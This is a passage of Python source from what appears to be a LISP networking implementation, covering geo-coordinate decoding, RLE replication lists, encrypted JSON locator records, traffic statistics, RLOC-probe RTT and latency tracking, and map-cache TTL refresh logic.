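    # Geo-coordinate LCAF layout shared by encode_geo()/decode_geo()
    # (flag-bit meanings inferred from the code above: 0x40 = north
    # latitude, 0x20 = east longitude, 0x10 = altitude present, low bits
    # select the radius units):
    #
    #   "HBBBBH"        : AFI=LCAF, rsvd, rsvd, geo-coord type, rsvd, len
    #   "BBHBBHBBHIHHH" : flags, rsvd, rsvd, lat-degrees, lat-millisecs
    #                     (hi/lo), long-degrees, long-millisecs (hi/lo),
    #                     altitude, radius, rsvd, AFI
    #
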
    def decode_geo(self, packet, lcaf_len, radius_hi):
        packet_format = "BBHBBHBBHIHHH"
        format_size = struct.calcsize(packet_format)
        if (lcaf_len < format_size): return(None)

        flags, rsvd1, rsvd2, lat, lat_ms_hi, lat_ms_lo, lon, lon_ms_hi, \
            lon_ms_lo, alt, radius, rsvd3, afi = struct.unpack(
            packet_format, packet[:format_size])

        #
        # A nested LCAF AFI is not supported inside a geo-coord LCAF.
        #
        afi = socket.ntohs(afi)
        if (afi == LISP_AFI_LCAF): return(None)

        if (flags & 0x40): lat = -lat
        self.latitude = lat
        lat_secs = old_div(((lat_ms_hi << 16) | socket.ntohs(lat_ms_lo)),
            1000)
        self.lat_mins = old_div(lat_secs, 60)
        self.lat_secs = lat_secs % 60

        if (flags & 0x20): lon = -lon
        self.longitude = lon
        lon_secs = old_div(((lon_ms_hi << 16) | socket.ntohs(lon_ms_lo)),
            1000)
        self.long_mins = old_div(lon_secs, 60)
        self.long_secs = lon_secs % 60

        self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
        radius = socket.ntohs(radius)
        self.radius = radius if (flags & 0x02) else radius * 1000

        self.geo_name = None
        packet = packet[format_size::]

        if (afi != 0):
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()

        return(packet)

class lisp_rle_node(object):
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.level = 0
        self.translated_port = 0
        self.rloc_name = None

    def copy_rle_node(self):
        rle_node = lisp_rle_node()
        rle_node.address.copy_address(self.address)
        rle_node.level = self.level
        rle_node.translated_port = self.translated_port
        rle_node.rloc_name = self.rloc_name
        return(rle_node)

    def store_translated_rloc(self, rloc, port):
        self.address.copy_address(rloc)
        self.translated_port = port

    def get_encap_keys(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)

        addr_str = self.address.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)

class lisp_rle(object):
    def __init__(self, name):
        self.rle_name = name
        self.rle_nodes = []
        self.rle_forwarding_list = []

    def copy_rle(self):
        rle = lisp_rle(self.rle_name)
        for rle_node in self.rle_nodes:
            rle.rle_nodes.append(rle_node.copy_rle_node())

        rle.build_forwarding_list()
        return(rle)

    def print_rle(self, html, do_formatting):
        rle_str = ""
        for rle_node in self.rle_nodes:
            port = rle_node.translated_port

            rloc_name = ""
            if (rle_node.rloc_name != None):
                rloc_name = rle_node.rloc_name
                if (do_formatting): rloc_name = blue(rloc_name, html)
                rloc_name = "({})".format(rloc_name)

            addr_str = rle_node.address.print_address_no_iid()
            if (rle_node.address.is_local()): addr_str = red(addr_str, html)
            rle_str += "{}{}{}, ".format(addr_str,
                "" if port == 0 else ":" + str(port), rloc_name)

        return(rle_str[0:-2] if rle_str != "" else "")

    def build_forwarding_list(self):
        #
        # Find the level of our local RLOC in the (level-sorted) node
        # list; -1 means no local RLOC appears in the RLE.
        #
        level = -1
        for rle_node in self.rle_nodes:
            if (level == -1):
                if (rle_node.address.is_local()): level = rle_node.level
            else:
                if (rle_node.level > level): break

        level = 0 if level == -1 else rle_node.level

        #
        # Replicate to all nodes at the chosen level (level-128 nodes are
        # also included when forwarding at level 0), excluding our own
        # RLOC unless we are an RTR.
        #
        self.rle_forwarding_list = []
        for rle_node in self.rle_nodes:
            if (rle_node.level == level or (level == 0 and
                rle_node.level == 128)):
                if (lisp_i_am_rtr == False and rle_node.address.is_local()):
                    addr_str = rle_node.address.print_address_no_iid()
                    lprint("Exclude local RLE RLOC {}".format(addr_str))
                    continue

                self.rle_forwarding_list.append(rle_node)

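#
# Sketch of how build_forwarding_list() drives replication (hypothetical
# levels): with RLE nodes a(0), b(0), c(128), a system whose local RLOC
# is not in the list replicates to the level-0 nodes a and b (plus c at
# level 128); a system owning a or b replicates only to the next higher
# level, node c.
#
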
class lisp_json(object):
    def __init__(self, name, string, encrypted=False, ms_encrypt=False):
        #
        # Convert bytes to str so json.loads() and storage are uniform.
        #
        if (type(string) == bytes): string = string.decode()

        self.json_name = name
        self.json_encrypted = False
        try:
            json.loads(string)
        except:
            lprint("Invalid JSON string: '{}'".format(string))
            string = '{ "?" : "?" }'

        self.json_string = string

        #
        # When the map-server is configured with JSON keys, encrypt the
        # JSON string with the first configured key.
        #
        if (len(lisp_ms_json_keys) != 0):
            if (ms_encrypt == False): return
            self.json_key_id = list(lisp_ms_json_keys.keys())[0]
            self.json_key = lisp_ms_json_keys[self.json_key_id]
            self.encrypt_json()

        #
        # When running as "lig", the decryption key may be supplied in
        # the LISP_JSON_KEY environment variable as "[<key-id>]<key>".
        #
        if (lisp_log_id == "lig" and encrypted):
            key = os.getenv("LISP_JSON_KEY")
            if (key != None):
                index = -1
                if (key[0] == "[" and "]" in key):
                    index = key.find("]")
                    self.json_key_id = int(key[1:index])

                self.json_key = key[index+1::]

                self.decrypt_json()

    def add(self):
        self.delete()
        lisp_json_list[self.json_name] = self

    def delete(self):
        if (self.json_name in lisp_json_list):
            del(lisp_json_list[self.json_name])
            lisp_json_list[self.json_name] = None

    def print_json(self, html):
        good_string = self.json_string
        bad = "***"
        if (html): bad = red(bad, html)
        bad_string = bad + self.json_string + bad
        if (self.valid_json()): return(good_string)
        return(bad_string)

    def valid_json(self):
        try:
            json.loads(self.json_string)
        except:
            return(False)

        return(True)

    def encrypt_json(self):
        crypt_key = self.json_key.zfill(32)
        iv = "0" * 8

        json_dict = json.loads(self.json_string)
        for key in json_dict:
            value = json_dict[key]
            if (type(value) != str): value = str(value)
            value = chacha.ChaCha(crypt_key, iv).encrypt(value)
            json_dict[key] = binascii.hexlify(value)

        self.json_string = json.dumps(json_dict)
        self.json_encrypted = True

    def decrypt_json(self):
        crypt_key = self.json_key.zfill(32)
        iv = "0" * 8

        json_dict = json.loads(self.json_string)
        for key in json_dict:
            value = binascii.unhexlify(json_dict[key])
            json_dict[key] = chacha.ChaCha(crypt_key, iv).encrypt(value)

        try:
            self.json_string = json.dumps(json_dict)
            self.json_encrypted = False
        except:
            pass

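#
# Note on the encrypt_json()/decrypt_json() pair above: ChaCha is a
# stream cipher, so applying chacha.ChaCha(key, iv).encrypt() to the
# unhexlified ciphertext with the same key and 8-byte IV recovers the
# plaintext; decrypt_json() relies on that symmetry rather than a
# separate decrypt call.
#
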
class lisp_stats(object):
    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0
        self.last_packet_count = 0
        self.last_byte_count = 0
        self.last_increment = None

    def increment(self, octets):
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()

    def recent_packet_sec(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 1)

    def recent_packet_min(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 60)

    def stat_colors(self, c1, c2, html):
        if (self.recent_packet_sec()):
            return(green_last_sec(c1), green_last_sec(c2))

        if (self.recent_packet_min()):
            return(green_last_min(c1), green_last_min(c2))

        return(c1, c2)

    def normalize(self, count):
        count = str(count)
        digits = len(count)
        if (digits > 12):
            count = count[0:-10] + "." + count[-10:-7] + "T"
            return(count)

        if (digits > 9):
            count = count[0:-9] + "." + count[-9:-7] + "B"
            return(count)

        if (digits > 6):
            count = count[0:-6] + "." + count[-6] + "M"
            return(count)

        return(count)

    def get_stats(self, summary, html):
        last_check = self.last_rate_check
        last_packets = self.last_packet_count
        last_bytes = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count

        delta = self.last_rate_check - last_check
        if (delta == 0):
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int(old_div((self.packet_count - last_packets),
                delta))
            bit_rate = old_div((self.byte_count - last_bytes), delta)
            bit_rate = old_div((bit_rate * 8), 1000000)
            bit_rate = round(bit_rate, 2)

        #
        # Normalize packet-count and byte-count for brief displays.
        #
        pc = self.normalize(self.packet_count)
        bc = self.normalize(self.byte_count)

        #
        # Return a one-line summary, or full detail otherwise.
        #
        if (summary):
            sep = "<br>" if html else ""
            pc, bc = self.stat_colors(pc, bc, html)
            title = "packet-count: {}{}byte-count: {}".format(pc, sep, bc)
            stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format(
                packet_rate, bit_rate)

            if (html != ""): stats = lisp_span(title, stats)
        else:
            pr = str(packet_rate)
            br = str(bit_rate)
            if (html):
                pc = lisp_print_cour(pc)
                pr = lisp_print_cour(pr)
                bc = lisp_print_cour(bc)
                br = lisp_print_cour(br)

            sep = "<br>" if html else ", "

            stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
                "{}{}bit-rate: {} mbps").format(pc, sep, pr, sep, bc, sep,
                br)

        return(stats)

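#
# Output sketch for lisp_stats.normalize() (illustrative): counts are
# shortened for display, e.g. 1234567 -> "1.2M" and 9876543210 ->
# "9.87B"; values with 6 or fewer digits are returned unchanged.
#
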
lisp_decap_stats = {
    "good-packets": lisp_stats(), "ICV-error": lisp_stats(),
    "checksum-error": lisp_stats(), "lisp-header-error": lisp_stats(),
    "no-decrypt-key": lisp_stats(), "bad-inner-version": lisp_stats(),
    "outer-header-error": lisp_stats()
}

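#
# Usage sketch for the decap-stats table (hypothetical call site): a
# decapsulation error path looks up its counter by name, e.g.:
#
#   lisp_decap_stats["checksum-error"].increment(len(packet))
#
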
class lisp_rloc(object):
    def __init__(self, recurse=True):
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_name = None
        self.interface = None
        self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.translated_port = 0
        self.priority = 255
        self.weight = 0
        self.mpriority = 255
        self.mweight = 0
        self.uptime = lisp_get_timestamp()
        self.state = LISP_RLOC_UP_STATE
        self.last_state_change = None
        self.rle_name = None
        self.elp_name = None
        self.geo_name = None
        self.json_name = None
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.stats = lisp_stats()
        self.last_rloc_probe = None
        self.last_rloc_probe_reply = None
        self.rloc_probe_rtt = -1
        self.recent_rloc_probe_rtts = [-1, -1, -1]
        self.rloc_probe_hops = "?/?"
        self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
        self.rloc_probe_latency = "?/?"
        self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
        self.last_rloc_probe_nonce = 0
        self.echo_nonce_capable = False
        self.map_notify_requested = False
        self.rloc_next_hop = None
        self.next_rloc = None
        self.multicast_rloc_probe_list = {}

        if (recurse == False): return

        #
        # When the default route has multiple next-hops, chain a copy of
        # this RLOC per next-hop so each path can be tracked separately.
        #
        next_hops = lisp_get_default_route_next_hops()
        if (next_hops == [] or len(next_hops) == 1): return

        self.rloc_next_hop = next_hops[0]
        last = self
        for nh in next_hops[1::]:
            hop = lisp_rloc(False)
            hop = copy.deepcopy(self)
            hop.rloc_next_hop = nh
            last.next_rloc = hop
            last = hop

    def up_state(self):
        return(self.state == LISP_RLOC_UP_STATE)

    def unreach_state(self):
        return(self.state == LISP_RLOC_UNREACH_STATE)

    def no_echoed_nonce_state(self):
        return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)

    def down_state(self):
        return(self.state in [LISP_RLOC_DOWN_STATE,
            LISP_RLOC_ADMIN_DOWN_STATE])

    def print_state(self):
        if (self.state is LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state is LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state is LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state is LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
        return("invalid-state")

    def print_rloc(self, indent):
        uptime = lisp_print_elapsed(self.uptime)
        lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
            red(self.rloc.print_address(), False), uptime, self.print_state(),
            self.priority, self.weight, self.mpriority, self.mweight))

    def print_rloc_name(self, cour=False):
        if (self.rloc_name == None): return ("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return ('rloc-name: {}'.format(blue(rloc_name, cour)))
    def store_rloc_from_record(self, rloc_record, nonce, source):
        port = LISP_DATA_PORT
        self.rloc.copy_address(rloc_record.rloc)
        self.rloc_name = rloc_record.rloc_name

        #
        # If this RLOC is behind a NAT, use the translated address and
        # port learned from stored Info-Request state.
        #
        rloc = self.rloc
        if (rloc.is_null() == False):
            nat_info = lisp_get_nat_info(rloc, self.rloc_name)
            if (nat_info):
                port = nat_info.port
                youngest = lisp_nat_state_info[self.rloc_name][0]
                addr_str = rloc.print_address_no_iid()
                rloc_str = red(addr_str, False)
                name_str = "" if self.rloc_name == None else \
                    blue(self.rloc_name, False)

                #
                # If the matched NAT state timed out, fall back to the
                # youngest (most recently refreshed) entry, if any.
                #
                if (nat_info.timed_out()):
                    lprint(("  Matched stored NAT state timed out for " +
                        "RLOC {}:{}, {}").format(rloc_str, port, name_str))

                    nat_info = None if (nat_info == youngest) else youngest
                    if (nat_info and nat_info.timed_out()):
                        port = nat_info.port
                        rloc_str = red(nat_info.address, False)
                        lprint(("  Youngest stored NAT state timed out " +
                            "for RLOC {}:{}, {}").format(rloc_str, port,
                            name_str))
                        nat_info = None

                #
                # Use the stored NAT state address and port and remember
                # the translation on this RLOC entry.
                #
                if (nat_info):
                    if (nat_info.address != addr_str):
                        lprint("RLOC conflict, RLOC-record {}, NAT state {}".format(rloc_str, red(nat_info.address, False)))
                        self.rloc.store_address(nat_info.address)

                    rloc_str = red(nat_info.address, False)
                    port = nat_info.port
                    lprint("  Use NAT translated RLOC {}:{} for {}".format(
                        rloc_str, port, name_str))
                    self.store_translated_rloc(rloc, port)

        #
        # Copy geo, ELP, and JSON locator parameters from the RLOC-record.
        #
        self.geo = rloc_record.geo
        self.elp = rloc_record.elp
        self.json = rloc_record.json

        #
        # For each RLE node, store any NAT translated encap-port.
        #
        self.rle = rloc_record.rle
        if (self.rle):
            for rle_node in self.rle.rle_nodes:
                rloc_name = rle_node.rloc_name
                nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
                if (nat_info == None): continue

                port = nat_info.port
                name_str = rloc_name
                if (name_str): name_str = blue(rloc_name, False)

                lprint(("  Store translated encap-port {} for RLE-" +
                    "node {}, rloc-name '{}'").format(port,
                    rle_node.address.print_address_no_iid(), name_str))
                rle_node.translated_port = port

        self.priority = rloc_record.priority
        self.mpriority = rloc_record.mpriority
        self.weight = rloc_record.weight
        self.mweight = rloc_record.mweight
        if (rloc_record.reach_bit and rloc_record.local_bit and
            rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE

        #
        # Store encap keys only when the Map-Reply source is the RLOC
        # itself.
        #
        rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
            source != None else None

        if (rloc_record.keys != None and rloc_is_source):
            key = rloc_record.keys[1]
            if (key != None):
                addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
                    str(port)
                key.add_key_by_rloc(addr_str, True)
                lprint("  Store encap-keys for nonce 0x{}, RLOC {}".format(
                    lisp_hex_string(nonce), red(addr_str, False)))

        return (port)
    def store_translated_rloc(self, rloc, port):
        self.rloc.copy_address(rloc)
        self.translated_rloc.copy_address(rloc)
        self.translated_port = port

    def is_rloc_translated(self):
        return (self.translated_rloc.is_null() == False)

    def rloc_exists(self):
        if (self.rloc.is_null() == False): return (True)
        if (self.rle_name or self.geo_name or self.elp_name or
            self.json_name):
            return (False)
        return (True)

    def is_rtr(self):
        #
        # An RTR advertises the reserved parameter tuple 254/0/255/0.
        #
        return ((self.priority == 254 and self.mpriority == 255 and
            self.weight == 0 and self.mweight == 0))
    def print_state_change(self, new_state):
        current_state = self.print_state()
        state_str = "{} -> {}".format(current_state, new_state)
        if (new_state == "up" and self.unreach_state()):
            state_str = bold(state_str, False)
        return (state_str)

    def print_rloc_probe_rtt(self):
        if (self.rloc_probe_rtt == -1): return ("none")
        return (self.rloc_probe_rtt)

    def print_recent_rloc_probe_rtts(self):
        rtts = str(self.recent_rloc_probe_rtts)
        rtts = rtts.replace("-1", "?")
        return (rtts)
    def compute_rloc_probe_rtt(self):
        last_rtt = self.rloc_probe_rtt
        self.rloc_probe_rtt = -1
        if (self.last_rloc_probe_reply == None): return
        if (self.last_rloc_probe == None): return
        self.rloc_probe_rtt = self.last_rloc_probe_reply - \
            self.last_rloc_probe
        self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
        recent = self.recent_rloc_probe_rtts
        self.recent_rloc_probe_rtts = [last_rtt] + recent[0:-1]
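    #
    # Worked example of the sliding window above: if recent_rloc_probe_rtts
    # is [0.5, 0.7, 0.9] and the previous rloc_probe_rtt was 0.3, the next
    # computed RTT yields a window of [0.3, 0.5, 0.7]; -1 entries render as
    # "?" in print_recent_rloc_probe_rtts().
    #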
    def print_rloc_probe_hops(self):
        return (self.rloc_probe_hops)

    def print_recent_rloc_probe_hops(self):
        return (str(self.recent_rloc_probe_hops))

    def store_rloc_probe_hops(self, to_hops, from_ttl):
        #
        # Convert probe TTLs to hop-count strings. "?" means unknown and
        # "!" flags a TTL that came back below half the probe TTL, which
        # looks implausible for a real path.
        #
        if (to_hops == 0):
            to_hops = "?"
        elif (to_hops < old_div(LISP_RLOC_PROBE_TTL, 2)):
            to_hops = "!"
        else:
            to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)

        if (from_ttl < old_div(LISP_RLOC_PROBE_TTL, 2)):
            from_hops = "!"
        else:
            from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)

        last_hops = self.rloc_probe_hops
        self.rloc_probe_hops = to_hops + "/" + from_hops
        recent = self.recent_rloc_probe_hops
        self.recent_rloc_probe_hops = [last_hops] + recent[0:-1]
    def store_rloc_probe_latencies(self, json_telemetry):
        telemetry = lisp_decode_telemetry(json_telemetry)

        #
        # One-way latencies from the four probe timestamps: outbound is
        # etr-in minus itr-out, return is itr-in minus etr-out.
        #
        forward = round(float(telemetry["etr-in"]) -
            float(telemetry["itr-out"]), 3)
        reverse = round(float(telemetry["itr-in"]) -
            float(telemetry["etr-out"]), 3)

        last_latency = self.rloc_probe_latency
        self.rloc_probe_latency = str(forward) + "/" + str(reverse)
        recent = self.recent_rloc_probe_latencies
        self.recent_rloc_probe_latencies = [last_latency] + recent[0:-1]

    def print_rloc_probe_latency(self):
        return (self.rloc_probe_latency)

    def print_recent_rloc_probe_latencies(self):
        return (str(self.recent_rloc_probe_latencies))
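    #
    # Worked example for the telemetry math above (timestamps are epoch
    # seconds carried in the probe's JSON): with itr-out=100.000,
    # etr-in=100.040, etr-out=100.050, itr-in=100.095, the stored one-way
    # latencies are 0.04 forward and 0.045 reverse, printed "0.04/0.045".
    #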
    def process_rloc_probe_reply(self, ts, nonce, eid, group, hop_count,
        ttl, json_telemetry):

        #
        # Find the RLOC (possibly a multihoming clone) whose probe nonce
        # matches this reply.
        #
        rloc = self
        while (True):
            if (rloc.last_rloc_probe_nonce == nonce): break
            rloc = rloc.next_rloc
            if (rloc == None):
                lprint("    No matching nonce state found for nonce 0x{}".format(lisp_hex_string(nonce)))
                return

        #
        # Compute RTT and transition the RLOC to up-state.
        #
        rloc.last_rloc_probe_reply = ts
        rloc.compute_rloc_probe_rtt()
        state_str = rloc.print_state_change("up")
        if (rloc.state != LISP_RLOC_UP_STATE):
            lisp_update_rtr_updown(rloc.rloc, True)
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()
            mc = lisp_map_cache.lookup_cache(eid, True)
            if (mc): lisp_write_ipc_map_cache(True, mc)

        #
        # Store hop counts from the probe TTLs, and latencies if the reply
        # carried JSON telemetry.
        #
        rloc.store_rloc_probe_hops(hop_count, ttl)
        if (json_telemetry): rloc.store_rloc_probe_latencies(json_telemetry)

        probe_str = bold("RLOC-probe reply", False)
        addr_str = rloc.rloc.print_address_no_iid()
        rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
        port = ":{}".format(self.translated_port) if \
            self.translated_port != 0 else ""

        nh_str = ""
        if (rloc.rloc_next_hop != None):
            device, nh = rloc.rloc_next_hop
            nh_str = ", nh {}({})".format(nh, device)

        latency = bold(rloc.print_rloc_probe_latency(), False)
        latency = ", latency {}".format(latency) if json_telemetry else ""

        eid_str = green(lisp_print_eid_tuple(eid, group), False)

        lprint(("    Received {} from {}{} for {}, {}, rtt {}{}, " +
            "to-ttl/from-ttl {}{}").format(probe_str, red(addr_str, False),
            port, eid_str, state_str, rtt, nh_str,
            str(hop_count) + "/" + str(ttl), latency))

        if (rloc.rloc_next_hop == None): return

        #
        # Multihomed: find the up RLOC with the lowest RTT and install a
        # host-route to the probed RLOC via that next-hop.
        #
        rloc = None
        best = None
        while (True):
            rloc = self if rloc == None else rloc.next_rloc
            if (rloc == None): break
            if (rloc.up_state() == False): continue
            if (rloc.rloc_probe_rtt == -1): continue
            if (best == None): best = rloc
            if (rloc.rloc_probe_rtt < best.rloc_probe_rtt): best = rloc

        if (best != None):
            device, nh = best.rloc_next_hop
            nh_str = bold("nh {}({})".format(nh, device), False)
            lprint("    Install host-route via best {}".format(nh_str))
            lisp_install_host_route(addr_str, None, False)
            lisp_install_host_route(addr_str, nh, True)
    def add_to_rloc_probe_list(self, eid, group):
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)

        if (addr_str not in lisp_rloc_probe_list):
            lisp_rloc_probe_list[addr_str] = []

        #
        # Replace any stale entry for the same (eid, group); if this exact
        # RLOC is already listed, leave the list alone.
        #
        if (group.is_null()): group.instance_id = 0
        for r, e, g in lisp_rloc_probe_list[addr_str]:
            if (e.is_exact_match(eid) and g.is_exact_match(group)):
                if (r == self):
                    if (lisp_rloc_probe_list[addr_str] == []):
                        lisp_rloc_probe_list.pop(addr_str)
                    return
                lisp_rloc_probe_list[addr_str].remove([r, e, g])
                break

        lisp_rloc_probe_list[addr_str].append([self, eid, group])

        #
        # If the first entry for this address is unreachable, inherit that
        # state so probing treats all entries for the address consistently.
        #
        rloc = lisp_rloc_probe_list[addr_str][0][0]
        if (rloc.state == LISP_RLOC_UNREACH_STATE):
            self.state = LISP_RLOC_UNREACH_STATE
            self.last_state_change = lisp_get_timestamp()
    def delete_from_rloc_probe_list(self, eid, group):
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)
        if (addr_str not in lisp_rloc_probe_list): return

        delete_entry = []
        for entry in lisp_rloc_probe_list[addr_str]:
            if (entry[0] != self): continue
            if (entry[1].is_exact_match(eid) == False): continue
            if (entry[2].is_exact_match(group) == False): continue
            delete_entry = entry
            break

        if (delete_entry == []): return

        try:
            lisp_rloc_probe_list[addr_str].remove(delete_entry)
            if (lisp_rloc_probe_list[addr_str] == []):
                lisp_rloc_probe_list.pop(addr_str)
        except:
            return
    def print_rloc_probe_state(self, trailing_linefeed):
        output = ""
        rloc = self
        while (True):
            sent_ts = rloc.last_rloc_probe
            if (sent_ts == None): sent_ts = 0
            reply_ts = rloc.last_rloc_probe_reply
            if (reply_ts == None): reply_ts = 0
            rtt = rloc.print_rloc_probe_rtt()
            indent = space(4)

            if (rloc.rloc_next_hop == None):
                output += "RLOC-Probing:\n"
            else:
                device, nh = rloc.rloc_next_hop
                output += "RLOC-Probing for nh {}({}):\n".format(nh, device)

            output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " +
                "received: {}, rtt {}").format(indent,
                lisp_print_elapsed(sent_ts), indent,
                lisp_print_elapsed(reply_ts), rtt)

            if (trailing_linefeed): output += "\n"

            rloc = rloc.next_rloc
            if (rloc == None): break
            output += "\n"

        return (output)
    def get_encap_keys(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return (keys[1].encrypt_key, keys[1].icv_key)
            return (None, None)
        except:
            return (None, None)

    def rloc_recent_rekey(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port

        try:
            key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
            if (key == None): return (False)
            if (key.last_rekey == None): return (True)
            return (time.time() - key.last_rekey < 1)
        except:
            return (False)
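#
# A minimal illustrative helper, assuming only the lisp_rloc fields defined
# above; it is hypothetical and never called by this file. It walks a
# multihomed lisp_rloc chain and collects (next-hop, probe-RTT) pairs, e.g.
# to compare per-next-hop reachability.
#
def _example_walk_rloc_chain(rloc):
    rtts = []
    while (rloc != None):
        rtts.append((rloc.rloc_next_hop, rloc.rloc_probe_rtt))
        rloc = rloc.next_rloc
    return (rtts)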
class lisp_mapping(object):
    def __init__(self, eid, group, rloc_set):
        self.eid = eid
        if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = group
        if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_set = rloc_set
        self.best_rloc_set = []
        self.build_best_rloc_set()
        self.uptime = lisp_get_timestamp()
        self.action = LISP_NO_ACTION
        self.expires = None
        self.map_cache_ttl = None
        self.register_ttl = LISP_REGISTER_TTL
        self.last_refresh_time = self.uptime
        self.source_cache = None
        self.map_replies_sent = 0
        self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.use_mr_name = "all"
        self.use_ms_name = "all"
        self.stats = lisp_stats()
        self.dynamic_eids = None
        self.checkpoint_entry = False
        self.secondary_iid = None
        self.signature_eid = False
        self.gleaned = False
        self.recent_sources = {}
        self.last_multicast_map_request = 0
        self.subscribed_eid = None
        self.subscribed_group = None
    def print_mapping(self, eid_indent, rloc_indent):
        uptime = lisp_print_elapsed(self.uptime)
        group = "" if self.group.is_null() else \
            ", group {}".format(self.group.print_prefix())
        lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
            green(self.eid.print_prefix(), False), group, uptime,
            len(self.rloc_set)))
        for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)

    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.eid, self.group))
    def print_ttl(self):
        ttl = self.map_cache_ttl
        if (ttl == None): return ("forever")

        #
        # TTL is stored in seconds; convert to the largest whole unit.
        #
        if (ttl >= 3600):
            if ((ttl % 3600) == 0):
                ttl = str(old_div(ttl, 3600)) + " hours"
            else:
                ttl = str(old_div(ttl, 60)) + " mins"
        elif (ttl >= 60):
            if ((ttl % 60) == 0):
                ttl = str(old_div(ttl, 60)) + " mins"
            else:
                ttl = str(ttl) + " secs"
        else:
            ttl = str(ttl) + " secs"
        return (ttl)
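    #
    # Example outputs for print_ttl() above, with the seconds-to-minutes
    # conversion as written: 7200 -> "2 hours", 5400 -> "90 mins",
    # 45 -> "45 secs", None -> "forever".
    #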
    def refresh(self):
        if (self.group.is_null()): return (self.refresh_unicast())
        return (self.refresh_multicast())

    def refresh_unicast(self):
        return (self.is_active() and self.has_ttl_elapsed() and
            self.gleaned == False)

    def refresh_multicast(self):
        #
        # Refresh a multicast entry only in a small window around TTL
        # expiry, and rate-limit Map-Requests to one every 2 seconds.
        #
        elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
        in_window = (elapsed in [0, 1, 2])
        if (in_window == False): return (False)

        rate_limited = ((time.time() -
            self.last_multicast_map_request) <= 2)
        if (rate_limited): return (False)

        self.last_multicast_map_request = lisp_get_timestamp()
        return (True)
    def has_ttl_elapsed(self):
        if (self.map_cache_ttl == None): return (False)
        elapsed = time.time() - self.last_refresh_time
        if (elapsed >= self.map_cache_ttl): return (True)

        #
        # Also report elapsed once we are within 10% of the TTL so the
        # entry can be refreshed before it actually expires.
        #
        refresh_time = self.map_cache_ttl - (old_div(self.map_cache_ttl, 10))
        if (elapsed >= refresh_time): return (True)
        return (False)
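    #
    # Example: with a map_cache_ttl of 60 seconds, has_ttl_elapsed() starts
    # returning True at 54 seconds (90% of the TTL), giving the refresh a
    # head start before the entry expires.
    #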
    def is_active(self):
        if (self.stats.last_increment == None): return (False)
        elapsed = time.time() - self.stats.last_increment
        return (elapsed <= 60)

    def match_eid_tuple(self, db):
        if (self.eid.is_exact_match(db.eid) == False): return (False)
        if (self.group.is_exact_match(db.group) == False): return (False)
        return (True)

    def sort_rloc_set(self):
        self.rloc_set.sort(key=operator.attrgetter('rloc.address'))

    def delete_rlocs_from_rloc_probe_list(self):
        for rloc in self.best_rloc_set:
            rloc.delete_from_rloc_probe_list(self.eid, self.group)
    def build_best_rloc_set(self):
        old_best = self.best_rloc_set
        self.best_rloc_set = []
        if (self.rloc_set == None): return

        #
        # Find the numerically lowest (best) priority among up RLOCs.
        #
        best_priority = 256
        for rloc in self.rloc_set:
            if (rloc.up_state()):
                best_priority = min(rloc.priority, best_priority)

        #
        # Keep every RLOC at or better than that priority. Unreachable
        # RLOCs get a probe timestamp so RLOC-probing can bring them back.
        #
